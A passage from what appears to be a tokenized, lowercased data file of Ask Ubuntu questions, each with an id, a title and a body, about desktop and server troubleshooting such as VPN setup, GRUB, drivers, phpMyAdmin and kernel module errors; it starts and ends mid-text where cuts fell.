/etc/networkmanager/system-connections/myvpn file ( some details replaced with x characters for privacy ) : [ connection ] id=myvpn uuid=xxxxxxxxxx-xxxx-xxxx-xxxxx-xxxxxxxxxxxxxxx type=vpn [ vpn ] service-type=org.xxxxxxxxxxxxxx.xxxxxxxxxxxxxxx.openvpn username=xxxxxxxxxx comp-lzo=yes remote=us-xxxxxx.xxxxxxx.com connection-type=password password-flags=0 ca=/etc/openvpn/xxxxxxx.crt [ vpn-secrets ] password=xxxxxxxxxxx [ ipv4 ] method=auto never-default=true also , i just want to add that when i turn on the vpn using the applet in top right corner the xfce panel , it connects no problem . so the issue does n't seem to me to be one of incorrect authorization , but of the configuration when trying to do this from the command line . update : i 'm not entirely sure what has changed - possibly something in the upgrade to 12.10 - but i can now start my vpn service from the command line . however , this command only works once when i very first start the computer , and also it needs to be run with sudo . mythbuntu @ mythbuntu : ~ $ nmcli con up id `` private internet access ssl '' error : connection activation failed : not authorized to control networking . mythbuntu @ mythbuntu : ~ $ sudo nmcli con up id `` private internet access ssl '' [ sudo ] password for mythbuntu : mythbuntu @ mythbuntu : ~ $ since i need to use sudo to run this , i ca n't run it automatically at startup . how do i get it so that i can start my vpn without super user permissions ?
198138	how to start a graphical utility from command line	in my machine i have installed ubuntu 12.04 and i have installed putty . i want to start putty from command line . when i run the program from command line and after closing the terminal , putty also gets terminated . how to avoid that ?
198145	gnome 3 freezes when switching workspaces	i have found an odd problem with gnome 3 on ubuntu recently . under certain circumstances , when switching between two workspaces the whole desktop and user interface will 'freeze ' for anything up to 2 minutes ; during this time i can not click anything or interact using the keyboard . often , the screen will show a 'half-completed ' animation of the workspace swapper . this is on ubuntu 12.04.1 running on a 2-year old macbook pro , and it only seems to occur when using an external monitor . this does not seem to be a processor or memory issue , and does not occur every time i switch workspaces . is this a known problem ? what can i do in the short or long term to fix it ?
198150	black screen after os loads	ok , so today i was installing eset nod32 linux onto my computer , i 'm a newbie at linux though , anyway , during the installation i recieved a few error messages which i dismissed as the installation still `` finished '' in that it showed the finished message , afterwards i proceeded to restart my laptop . everything ( os , grub , etc . ) loaded up , and after 7s or so ubuntu finished loading , then my screen simply went black . i 've tried for the last few hours every repair i could find on this website , and to no avail , i have still got a black screen , i can still access the terminal with alt + f1-6 but once i press alt + f7 to go back to the gui my laptop freezes up , and i have to powerdown and reboot . i 'm running ubuntu 12.04 64bit , 4gb ram , intel pentium t4500 dual core . edit : btw , i know there is approx 8.3*10^300 more of these questions but they did n't work for me : | . another edit : my laptop heats up fast and the fan runs constantly whilst running in this state , i hope that can be of use in determining the issue at hand ?
198153	is there still heating problem with acer laptop ?	i had previously installed ubuntu 11.10 ( or may be some other 11.xx variant i 'm not sure ) in my acer apsire 5755g laptop . which had i5 second generation processor , with 2gb nvidia graphics card and 4gb of ram . i 'm thinking to install the newer version i.e 12.04 , so still is there that heating problem with acer laptop ? note : there is no such heating problem with my laptop while running windows .
198154	how to install imagemagick extension for php5 on xubuntu 12.04.1 lts	how to properly install imagemagick extension for php5 on xubuntu 12.04.1 lts ? convert -- version version : imagemagick 6.6.9-7 2012-08-17 q16 sudo pecl install imagick ... checking if imagemagick version is at least 6.2.4 ... configure : error : no . you need at least imagemagick version 6.2.4 to use imagick . what am i doing wrong ? )
198155	video not displayed in xubuntu	i have xubuntu installed in my pc . when i play a video after starting the system it plays fine . after some time the video is not displayed and i can only hear sound . if i reboot my pc then the video is again displayed . i installed vlc player but it did not solve my problem .
198156	is it possible to revert from dualboot back to uniboot ( windows 7 starter only ) ?	i am on a netbook and got recommended to try ubuntu . so i am going to run it with windows 7 starter still as my os . but if i decide to go with ubuntu as my main os is there any way to go back to windows 7 starter if for whatever reason i change my mind ? sorry if it is a simple , silly question . i am unsure so thought i would ask .
198158	how do i set up a roaming profile ?	i am new to ubuntu and recently started working , i wanted to set a roaming profile on ubuntu server . so user can login in from any computer and there worked can be saved directly to the server . any help suggestion wou
198163	how to install oracle express 11gr2 ?	i need a step by step guide for installing oracle database express edition version 11g release r2 on ubuntu desktop 12.04.1 lts 64 bit edition
198169	i want to make tomcat7 autostart while booting	i installed tomcat servlet but i need to autostart while booting.how to ?
198170	restoring multiple mysql databases from one file at the command line ?	i have exported all my databases to a file using phpmyadmin . unfortunately i do n't have a working phpmyadmin in my destination system . how should i restore all of them at once using one line command ?
198175	how to stream h264 video from camera over ftp ?	i bought a h264 security camera system last year and set it up to ftp video to my computer . i was able to get the video to play ( even though it played a little fast ) on ubuntu 11.04 using mplayer . a few months ago , i did a fresh install of 12.04 and i can not seem to get the video to play with mplayer , smplayer or vlc . i have the restricted formats video packages installed and when playing with any of the players , all i get is a gray video . when calling mplayer from the command line to play the video with no options , i get a lot of these errors : [ h264 @ 0x7f278c61f280 ] concealing 1320 dc , 1320 ac , 1320 mv errors no pts value from demuxer to use for frame ! pts after filters missing i 'm not a video expert and have been coming up with a lot of dead ends when googling for this . could someone offer some advice about how to play these videos ? here is the output of mediainfo for a sample file . mediainfo -f sec-cam01-m-20120921-212454.h264 general count : 278 count of stream of this kind : 1 kind of stream : general kind of stream : general stream identifier : 0 count of video streams : 1 video_format_list : avc video_format_withhint_list : avc codecs video : avc complete name : sec-cam01-m-20120921-212454.h264 file name : sec-cam01-m-20120921-212454 file extension : h264 format : avc format : avc format/info : advanced video codec format/url : http : //developers.videolan.org/x264.html format/extensions usually used : avc h264 commercial name : avc internet media type : video/h264 codec : avc codec : avc codec/info : advanced video codec codec/url : http : //developers.videolan.org/x264.html codec/extensions usually used : avc h264 file size : 1097315 file size : 1.05 mib file size : 1 mib file size : 1.0 mib file size : 1.05 mib file size : 1.046 mib file last modification date : utc 2012-09-22 01:27:12 file last modification date ( local ) : 2012-09-21 21:27:12 video count : 205 count of stream of this kind : 1 kind of stream : video kind of stream : video stream identifier : 0 format : avc format/info : advanced video codec format/url : http : //developers.videolan.org/x264.html commercial name : avc format profile : baseline @ l4.0 format settings : 1 ref frames format settings , cabac : no format settings , cabac : no format settings , reframes : 1 format settings , reframes : 1 frame format settings , gop : m=1 , n=3 internet media type : video/h264 codec : avc codec : avc codec/family : avc codec/info : advanced video codec codec/url : http : //developers.videolan.org/x264.html codec profile : baseline @ l4.0 codec settings : 1 ref frames codec settings , cabac : no codec_settings_refframes : 1 width : 704 width : 704 pixels height : 480 height : 480 pixels pixel aspect ratio : 1.000 display aspect ratio : 1.467 display aspect ratio : 3:2 standard : ntsc resolution : 8 resolution : 8 bits colorimetry : 4:2:0 color space : yuv chroma subsampling : 4:2:0 bit depth : 8 bit depth : 8 bits scan type : progressive scan type : progressive interlacement : ppf interlacement : progressive edit : here is a sample video using the same encoding : https : //www.dropbox.com/s/l5acwzy8rtqn9xe/sec-cam08-m-20121118-105815.h264 ( not the same video as mediainfo output )
198187	install amd catalyst drivers 12.8	i have a hp g6 2105tx laptop . i have intel graphics 4000 and amd radeon 7670m graphics in it . i want to know how to install the drivers for such hybrid graphics . i have ubuntu 12.04 lts with kernel version 3.2.0.23 . i get error of low resolution if i install the amd catalyst drivers .
198194	how to move this bar in gnome ( classic ) to the top ?	how can i remove the bar at the bottom . it shows open windows and tabs . how can i have it on the menu bar at the top instead ? this is gnome classic .
198196	screen turns black after pressing volume button	i do n't know why but my laptop screen ( lenovo thinkpad sl300 ) suddenly turns black after turning down the volume and then comes back , with ugly problems , after turn it up . it started happening after doing some changes on compiz . can you help ?
198197	how do i choose which of the offered nvidia drivers is best ?	these are the options presented by jockey : nvidia accelerated graphics driver ( version 173 ) nvidia accelerated graphics driver ( post-release updates ) ( version 173-updates ) nvidia accelerated graphics driver ( version current ) [ recommended ] nvidia accelerated graphics driver ( post-release updates ) ( version current-updates ) i have chosen the recommend one ( the third on the list ) but due to intermittant unity & system lock ups when changing user or exiting a game , i think a change might be more suitable . how does the user make sense of these options to make the appropriate choice ?
198199	ubuntu 12.04 - not able to hibernate [ error creating hibernate image ]	in the process of hibernation my laptop running ubuntu 12.04 returns to the login screen after trying to hibernate . when i look into the syslog i could see an error with the following message : kernel : [ 34519.069373 ] pm : not enough free memory kernel : [ 34519.069374 ] pm : error -12 creating hibernation image any help would be greatly appreciated . thanks .
198200	how do i turn off the monitor when i close the lid ?	my problem is that when lid is closed , it just shows blank screen and not turning off the monitor , so my monitor is always on . but when i use win 7 and i close the lid it turns off the monitor , so i want my ubuntu to do the same thing . can anyone help me ? i have dell inspiron 1564
198203	firefox/opera password manager	on windows machines , firefox and opera both will fill in and save passwords in the password manager . why does it not function the same way in ubuntu ?
198206	i 'm unable to use grep to find strings in a file ?	as i use grep e.g : grep -il or -ir /directoryname it just displays all the file-names and when i opened them it does n't have the relevant specified string in it . i want to know does grep really work . or i want to change to something else .
198208	how do i access previously installed software after update	after upgrade i ca n't find my games & gnucash . software center says they 're installed but ca n't open them from there . documents and downloads are alright .
198209	upgrade is interrupted and my ubuntu system is somewhere between 11 and 12	my upgrade have been interrupted with the following terminal warning . i tried to re-upgrade my system for many times , but the same thing kept occurring . the last 4 lines in terminal ( during upgrade ) : found windows 7 ( loader ) on /dev/sda1 skipping windows 7 ( loader ) on wubi system found windows recovery environment ( loader ) on dev/sda2 skipping windows recovery environment ( loader ) on wubi system done after these lines , the upgrade is not continuing .
198210	even after i have uninstalled rhythmbox and transmission , software center keeps showing updates for them ?	as mentioned , i removed a lot of the stuff that i didnt need from the default install , and mostly there hasnt been any problem . however , software center keeps showing updates for rhythmbox and transmission enough though these were probably the first things i uninstalled . how do i stop software center from showing updates for them ?
198215	dual boot - no grub	i have windows 7 installed in a primary partition and wanted to install ubuntu 12.10 in a new partition . even before starting the installation , i knew that i might run into a few problems because the partition i was installing ubuntu on was displayed before the w7 partition in the disk manager of windows . after the install , i did n't get a grub menu on reboot but was directly booted into w7 . a used a liveusb to boot into ubuntu ( try ubuntu ) and ran the bootrepair software with the recommended settings . it showed an unsuccessful , the result now , i 'm still directly booting to w7 , but have access to the liveusb . can someone guide me on how to have grub displayed on boot ? ran bootrepair again with advanced settings ... the new results
198216	how to start 2 bash files ( node.js and mongodb ) when the pc starts but keep their terminal open ?	i have 2 bash files that initializes the server ; one for the database and the other for the code . i 've put in the startup applications preferences to start both of them but their terminal is not visible , but it works .
198217	my ubuntu server 12.04 box can not ping my adsl modem	my ubuntu server ( 12.04 ) box does n't ping my adsl modem . i 've setup a simple network which connects a xp box , a ubuntu server box and an adsl modem . the xp box pings the ubuntu server and the adsl modem , but the ubuntu server pings only the xp box . `` destination host unreachable '' is reported whenever the ubuntu server pings the adsl modem . how should i tackle the problem ?
198221	some keys on my laptop 's keyboard stops working after i login in ubuntu 11.10	i 'm using ubuntu 11.10 on my samsung r480 laptop.now the problem is that i ca n't use some keys on my laptop 's keyboard such as 'u ' , 'i ' , 'o ' , 'p ' , 'j ' , 'k ' , 'l ' , ' ; ''m ' , ' . ' and also when pressing the keys shows different behaviours such as right clicking , or moving the pointer , or inserting spaces etc ... .any way to solve the problem ... ? ? ?
198225	12.04 boot hangs after `` checking battery state '' , video card intel gma 4500mhd	on my thinkpad t400 , ubuntu 12.04 hangs after `` checking battery state '' and i have to boot the unity shell using startx in tty1 . my video card is an intel gma 4500mhd . i can not reinstall ubuntu ( because i have big software installs ) . it came after an upgrade . maybe it is a shell problem . lspci | grep vga 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) when using the recovery mode root console , xorg -configure leads to an error : could not create lock file /tmp/tx0-lock can you help please ?
198233	fast ( twice in < 1s ) pressing of the same key on keyboard is not recognized correctly . what can it be ?	if i press any button 2 times quickly ( i mean with less one second of delay between the keystrokes ) , ubuntu does n't detect the second one . in particularly , ubuntu seems to detect the pressure because when i push the backspace , i can listen the sound related to the beating , but it has no effect ( the letter is not inserted in the text or deleted in backspace case ) . how to fix it ? note : i used ubuntu 11.10
198237	connecting to a windows svn server from ubuntu	i need to access an svn repo hosted on a windows machine from ubuntu . however , even if i supply the proper credentials , it denies me access , apparently because windows does not allow linux connections ( as they told me ) ; sure enough , i got in when i tried to checkout from my xp partition . while i have my box dual-booted , it is inconvenient to switch just for svn . so , does anyone know how i can access that svn repo from ubuntu ? i 've tried installing tortoisesvn and windows subversion under wine but i ca n't even get them to run ; they were asking for some dlls that i do n't know how to supply . i 've thought of installing a virtual xp just for svn but i consider that too extreme and i 'd be glad if anyone can advise a simpler workaround . hopefully-relevant note : when i access the repo on windows , i use the prefix file : // ; svn : // and https : // results to an error . ( so , afaik , i 'm accessing the repo via our lan . )
198238	keep original timestamps of files downloaded with nautilus	is there a way to keep the original file date when downloading from server with nautilus ftp ? like it is now , the file has as date / time the downloaded date / time and not the one in the server ?
198245	can not install gnome shell extensions	i upgrade from 10.04 to 12.04 , install gnome 3 and remove unity . my gnome version is 3.4.1 . the gnome shell extensions is installed and enabled . when i use firefox to visit each extension page in https : //extensions.gnome.org/ , for example , https : //extensions.gnome.org/extension/5/alternative-status-menu/ , there is no where to install the extensions . i am told that one can install extensions by visite these extension pages . this is the guide i followed .
198248	why are bugs fixed in the development release and then backported instead of porting the fixes forward ?	i understand that backport repository sometimes contains the newer versions of softwares ( major upgrades ) and which might be included in the next ubuntu release . but not all of the softwares are n't backported to the previous release even if it is an lts . i do n't really fully understand the reason behind this policy . does this measn the next release ( development version ) is more important than an lts release ? or i have missed something ?
198251	phpmyadmin 404 error on fresh ubuntu 12.04 install	i regularly set up virtualbox ubuntu setups to run as local webservers . i have set these up several times and never had an issue . however , something has changed : 1 ) vb guest additions no longer allow me to copy and paste ( i 'll worry about that later ) 2 ) more importantly phpmyadmin no longer works as installed - initially going to localhost/phpmyadmin gave a message that the page could not be found . so i have followed some instructions which told me to do the following in var/www : sudo ln -s /usr/share/phpmyadmin phpmyadmin which has created a phpmyadmin directory in /var/www but now i get an error saying : the mysqli extension is missing . if i run phpinfo mysql and mysqli are listed . all i have done so far is sudo apt-get update sudo apt-get install apache2 sudo apt-get install php5 sudo apt-get install mysql-server and sudo apt-get install phpmyadmin i found a post of a similar question which suggested i should do sudo apt-get install php5-mysql ( i 've done this ) and edit php.ini and uncomment the line : extension=mysqli.so this is not there , so i tried adding it but no joy . i have restarted apache and still no phpmyadmin . i 'm running a windows 7 machine and the guest os is ubuntu 12.04
198256	ubuntu gui crash when lightdm enters , unable to login	this issue happened spounteniously , i don´t know what could have cause it as i wasn´t using the pc when it happened . i ruled out any messing around with the setting as the user doesn´t know how to enter the bios , doesn´t have the sudo password and was only using firefox and libreoffice when it happened . after the plymouth sequence i get this error . and this option : i follow each option and nothing happens after that . the issue persist after rebooting . i choose the other options to see if anything happens , i either get back to option 1 or doesn´t show anything anormal . ( i have pictures i someone wants to know ) what i found weird is that event though the error is possitioned in the chip , however ubuntu 10.04 and 12.04 run fine in a live cd i saw that some people are having issues when lightdm has a non default wallpaper , but i use a default one . thanks in advance .
198261	how to fix random erroneous behaviour of application windows when using compiz ?	i am not sure whether you have faced this . since we have switched to compiz as the window manager , the application windows show the following erratic behaviour at irregular basis for both of my machines ( different brands , different monitors , both running regularly upgraded versions of ubuntu ) , the windows once minimized and then maximized , move from one workspace to another . sometimes i loose a window , it can not be found in any of the workspaces . i have searched each and everyone of them . some application windows , once minimized and them maximized , change in size , mostly becoming larger . sometimes , when i try to move one window from one workspace to another using built-in workspace switcher , by click and drag , the window will go to all the workspaces except one random one . at first i thought that the workspace switcher ( not built-in ) was to blame . previously , i used docky , now i use avant window navigator , without any appreciable improvement in this regard . the problem is , the problem is regenerateable , but only on a random basis . i use 2 x 4 ( r x c ) workspaces . hope somebody can suggest me something .
198275	two ubuntus in my grub bootloader	i have a problem : i have windows 7 installed on my notebook . i wanted to install ubuntu on it . so i did . then i removed ubuntu because of several lags . and when i rebooted , it still showed ubuntu in the list of opsystems . so i thought , that reinstalling ubuntu will fix this problem . so i did . and now it shows : windows 7 ; ubuntu ; ubuntu . and when i try to boot into first ( old ) ubuntu , it shows an error ( because there is no such an operating system installed ) . the second ubuntu runs well . i just want to delete this uld ubuntu from the list . i tried to do this with synaptics , but it did not help .
198276	modify thermal trip points	can you please instruct me on how to modify critical trip points . my computer keeps shutting down and my sensors are telling me that i am running hot when utilizing demanding programs . i am utilizing ubuntu 12.10 . thank you .
198277	no auto-move of applications between workspaces	is there a way to configure unity so that it would n't move applications between workspaces automatically ? this happens a lot ( and annoys the hell out of me ) when i have many windows open and drag one so that most of it is placed in another workspace . video of the behaviour . here , the firebug window is placed to another workspace .
198279	how to fix `` could not retrieve the required disk image files '' error ?	i canâ´t install ubuntu with wubi on my windows 7 laptop , there is a pop up with the message could not retrieve the required disk image files
198281	my ubuntu 12.04 netbook stops at boot with purple screen when shutted down . after restart it works	my asus eee pc 1215b used to work like a charm since installation . but now there is a problem while booting . when i restart the computer it boots flawlessly but when i use shutdown for couple of hours it wo n't boot . it stucks just after bios screen with blank purple screen . when i restart it grub menu appears , when i choose proper line it boots without any problem . two of three times after starting computer i am urged to restart it . my specs : kernel user @ host : ~ $ uname -a linux rivendell 3.2.0-31-generic # 50-ubuntu smp fri sep 7 16:16:45 utc 2012 x86_64 x86_64 x86_64 gnu/linux lspci user @ host : ~ $ lspci 00:00.0 host bridge : advanced micro devices [ amd ] family 14h processor root complex 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati wrestler [ radeon hd 6290 ] 00:01.1 audio device : advanced micro devices [ amd ] nee ati wrestler hdmi audio [ radeon hd 6250/6310 ] 00:04.0 pci bridge : advanced micro devices [ amd ] family 14h processor root port 00:05.0 pci bridge : advanced micro devices [ amd ] family 14h processor root port 00:11.0 sata controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 42 ) 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge ( rev 40 ) 00:15.0 pci bridge : advanced micro devices [ amd ] nee ati sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 01:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 02:00.0 ethernet controller : atheros communications inc. ar8152 v2.0 fast ethernet ( rev c1 ) lsusb user @ host : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 058f:6366 alcor micro corp. multi flash reader bus 002 device 003 : id 04f2 : b26f chicony electronics co. , ltd bus 003 device 002 : id 046d : c52f logitech , inc. wireless mouse m305 /etc/grub/default user @ host : ~ $ cat /etc/default/grub grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=lsb_release -i -s 2 > /dev/null || echo debian grub_cmdline_linux_default= '' '' grub_cmdline_linux= '' '' *comments deleted
198284	are there any programs/applications/commands that will monitor and report gpu memory usage during a programs execution ?	we 're running algorithms on ubuntu and we need to know how much memory the program uses . any help is appreciated .
198287	why does youtube video look weird for me ?	colors look sort of blueish and and i wonder how to solve this :
198291	alt+tab loses focus	i often use alt+tab but sometimes , not always , after 0.3 secs it loses the focus on the newly switched window . no arrow on the right of the icon in the launcher , no name of the app in the top-left corner , no cursor active , but i see the correct window and the previous one is in the background . this happens with any window , often i switch between terminal and aptana ( so i press alt + tab ) , and there 's no shortcut assigned to alt itself . anyone has any idea what could be wrong ? thanks
198293	installing packages that require system restart , from a juju charm	i 'm writing a juju charm that installs some new packages , some of which require a system restart . in particular , daemontools-run installs an upstart file , which would start svcanboot on the next system restart . there 's no `` service '' file , so `` service svscanboot start '' would n't work . is there a way my charm can either : request a system restart ; or , start the service itself ?
198299	webapps ( not preview ) wo n't work in firefox but works in chromium - ubuntu 12.10	i 'm using ubuntu 12.10 latest beta . i 've installed webapps based on this guide : unity webapps available in the ubuntu 12.10 official repositories i was not able to make it work in firefox even once ( the popup does n't even appear ) , but it works great in chromium . i 've tryied few websites : - youtube - bbc news - facebook - gmail and a few others . i have not installed the preview version before . thanks .
198303	installing ubuntu 12 on a dell inspiron 1501 black screen with vertical color lines	i have a dell inspiron 1501 amd and i want to install ubuntu 12 but : i do not get to see the install screen . i wrote a boot cd put it in and restart ... first i get a screen of ubuntu ( purple with at the botum a keyboard and a little man ) then when i 'm supost to get the menu 's to install , i get a plack screen with vertikal collord lines . it is probible couse the videocart is not supported but how can i get ubuntu installed . thanks kristof
198306	ubuntu sees 2.0 ports as 1.1 ?	i have an asus m5a78l-m lx v2 motherboard , the usb ports of which are all usb 2.0 . i realised that my wireless usb card was working and connecting much faster connected to the front panel usb ports . here is the syslog output when it is connected to the motherboard usb ports : http : //paste.ubuntu.com/1269611/ it did connect eventually ... and here it is connected to the front panel : http : //paste.ubuntu.com/1269619/ as you might have seen , the log shows that connected to the front panel , the usb is 2-x , while the back is 1-1. lsusb while connected to front panel : http : //paste.ubuntu.com/1269622/ lsusb while connected to mb ports : http : //paste.ubuntu.com/1269622/ as you can see , lsusb thinks that 5 of my usb ports are usb 1.1 . even though i disable legacy usb in the bios . when timed , the back panel took 18 seconds to detect the netwoork , while the front panel took , if not immediately , 1-2 secs to detect the network . sorry for the long post , all help is greatly appreciated .
198313	policykit - e17 without lightdm : problems with webcam and connection manager	i 'm using e17 without lightdm ( it saves about 200 mb ram ) . i manage to do that easily and now i 'm starting e17 with the old nice startx and a .xinit file in my home root . my .xinit : exec dbus-launch enlightenment_start the issue : when i try to change wifi connection ( nm-applet ) i got a message ' ( 32 ) not authorized to control networking ' and my cam too is not working ( obviously everything is working ok if i pass through lightdm \ unity ) update 2 : because some alien intelligence close this question ( sorry but this is not the first time it happens to me ) without any good reason i only can add info here . this problem is related to console kit solution i have changed my .xinit : exec ck-launch-session enlightenment_start extra steps : - i have also set autologin in the console editing /etc/init/tty1.conf : change last line with this one ( and set your username ) exec /sbin/getty -a username -8 -s 38400 tty1 linux i have add this line to ~/.profile : [ [ $ ( fgconsole ) = 1 ] ] & & startx -- vt1 so startx start automatically at the boot update 3 : above solution fix problem with webcam but not for network-managager update 4 : here the final 'fix ' for webcam and network manager : i have changed my .xinit boot line with that : exec dbus-launch enlightenment_start apparently this is the starting point but know everything is working fine do n't ask me why : )
198316	accessing windows encrypted partition in ubuntu	i have a windows partition which has been encrypted by credant mobile guardian . the windows ad credentials are used to encrypt the files . and they are encrypted using an aes 256 encryption algo . ( rijandel 256 ) . is there any way i can open these files in ubuntu ?
198327	internet suddenly stopped working	i was using nomachine to access ubuntu 11.10 when suddenly the internet on ubuntu stopped working . now ubuntu does n't recognize the internet at all ( including locally ) . symptoms : does n't recognize the fact that there is an ethernet cable attached . ( i 've tried switching cables , did n't work . ) gui says `` no network devices available '' ca n't ping external ip addresses . tried changing /etc/network/interfaces to eth1 instead of eth0 but it did n't work . ifconfig provides no output relating to eth0 . when i type `` /etc/init.d/networking restart '' it tells me `` can not find device 'eth0'/failed to bring up eth0 . '' the network settings had used a static ip address prior to the crash . i do n't know why it wo n't recognize the ethernet ( i think this is the fundamental problem , but i might be wrong ) and why it stopped working so suddenly -- i have n't installed any updates lately . any ideas ? any more information i should provide ? edit : lspci recognizes the ethernet controller ; netstat does not . lspci calls it `` intel corporation device 0000 '' . i 'm not sure what this is supposed to be , because it seems kind of generic and that might mean it 's corrupted -- does anyone have any experience with corrupted ethernet cards ?
198331	apt-get tries to configure a removed kernel while installing a module	when i 'm trying to apt-get update/upgrade or anything related to the kernel i get the following trace . the kernel 3.5.0 is a kernel that was manually installed and manually removed . i probably missed something in the removal , and apt-get thinks it still exist . overall the commands fails , packages i want to remove still exist . update-initramfs : deferring update ( trigger activated ) update-initramfs : generating /boot/initrd.img-3.2.0-31-generic-pae info : enable nvidia-current debug : parsing /usr/share/nvidia-common/quirks/put_your_quirks_here debug : parsing /usr/share/nvidia-common/quirks/dell_latitude debug : parsing /usr/share/nvidia-common/quirks/lenovo_thinkpad debug : processing quirk latitude e6530 debug : failure to match gigabyte technology co. , ltd. with dell inc. debug : quirk does n't match debug : processing quirk thinkpad t420s debug : failure to match gigabyte technology co. , ltd. with lenovo debug : quirk does n't match removing old nvidia-current-295.40 dkms files ... loading new nvidia-current-295.40 dkms files ... error ! dkms tree already contains : nvidia-current-295.40 you can not add the same module/version combo more than once . dpkg : error processing nvidia-current ( -- configure ) : subprocess installed post-installation script returned error exit status 3 no apport report written because maxreports is reached already processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0 grep : /boot/config-3.5.0 : no such file or directory warning : missing /lib/modules/3.5.0 device driver support needs thus be built-in linux image ! warning : could n't open directory /lib/modules/3.5.0 : no such file or directory fatal : could not open /lib/modules/3.5.0/modules.dep.temp for writing : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file 